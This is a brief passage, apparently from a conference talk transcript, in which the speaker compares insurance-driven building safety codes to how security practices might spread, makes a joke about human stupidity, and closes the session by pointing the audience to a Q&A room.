and the insurance industries started creating building safety codes. And those aren't laws, but you can't get insurance on a building unless you meet these codes. And that's an awful lot of how we will ultimately get these things done because people are stupid. I mean, you know, it's the second most prevalent element in the universe. So I think we're being waived that we were out of time. OK? So our Q&A room is room 115. So please come to room 115 with us.